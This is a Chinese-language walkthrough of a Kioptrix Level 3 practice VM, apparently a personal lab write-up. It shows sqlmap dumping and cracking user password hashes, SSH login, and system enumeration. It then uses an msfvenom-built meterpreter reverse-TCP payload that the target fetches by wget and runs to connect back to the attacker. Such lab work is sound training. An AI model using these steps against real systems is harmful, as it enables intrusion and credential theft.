level-3-下集(wget与提权)

sqlmap获取数据库用户密码的hash值。参考

获得信息

用户名:dreg              hash值:0d3eccfb887aabd50f243b3f155c0f85    
解密后:Mast3r

用户名:loneferret      hash值:5badcaf789d3d1d09794d8f021f40f0e   
解密后:starwars 


sqlmap -u "kioptrix3.com/gallery/gallery.php?id=1" --users
--passwords

::: {.image-package}
{.uploaded-img
width=”auto” height=”auto”}\

::: {.image-caption}
:::
:::

然后丢到在线hash破解。https://hashkiller.co.uk/sha1-decrypter.aspx

::: {.image-package index=”1”}
{.uploaded-img
width=”auto” height=”auto”}\

::: {.image-caption}
:::
:::

获取信息2:

用户名:root   解密后密码:fuckeyou

用户名:debian-sys-maint   没有找到hash值对应的密码


ssh登陆:因为在上一篇信息搜集中,已知道开放了22端口,于是可以尝试登陆。管理员有可能使用重复的用户名和密码(图方便)。更方便的是弱密码。。2333

::: {.image-package}
{.uploaded-img
width=”auto” height=”auto”}\

::: {.image-caption}
:::
:::

尝试用root / fuckeyou 切换管理员账号,无效。

获取信息3:

file /bin/ls           #获得32位系统。

cat /etc/issue   #获取到 Ubuntu
8.04,有意思的是还获得了kioptrix小组的免责声明,说不要将此机器放在互联网上,因使用该机器造成的信息丢失等等概不负责。。

uname -a          #获取到,linux 2.6.24-24-server 内核版本

msfvenom生成攻击载荷,这么说还是有点拗口,不如说生成木马。生成的程序之后要在对方机子上运行,然后我们就可以连接了。

msfvenom -l | grep linux | grep x86

-l (list) 是攻击程序的列表,搜索32位linux的。

msfvenom -p linux/x86/meterpreter_reverse_tcp --payload-options

-p选择payload,攻击载荷;--payload-options查看payload所需参数

msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=192.168.1.112
LPORT=999 X > /var/www/html/back.door

kali机需要开启http服务

返回ssh的命令窗口,输入 wget http://攻击机ip/back.door
,成功下载攻击载荷

chomod a+x back.door ,添加可执行权限


先在攻击机运行

::: {.image-package}
{.uploaded-img
width=”auto” height=”auto”}\

::: {.image-caption}
:::
:::

然后在ssh命令行./back.door

::: {.image-package}
{.uploaded-img
width=”auto” height=”auto”}\

::: {.image-caption}
192.168.1.103是目标主机ip
:::
:::

本地获得meterpreter。在攻击机监听本地ip的999端口,back.door会主动连接kali
linux。
:::
:::
:::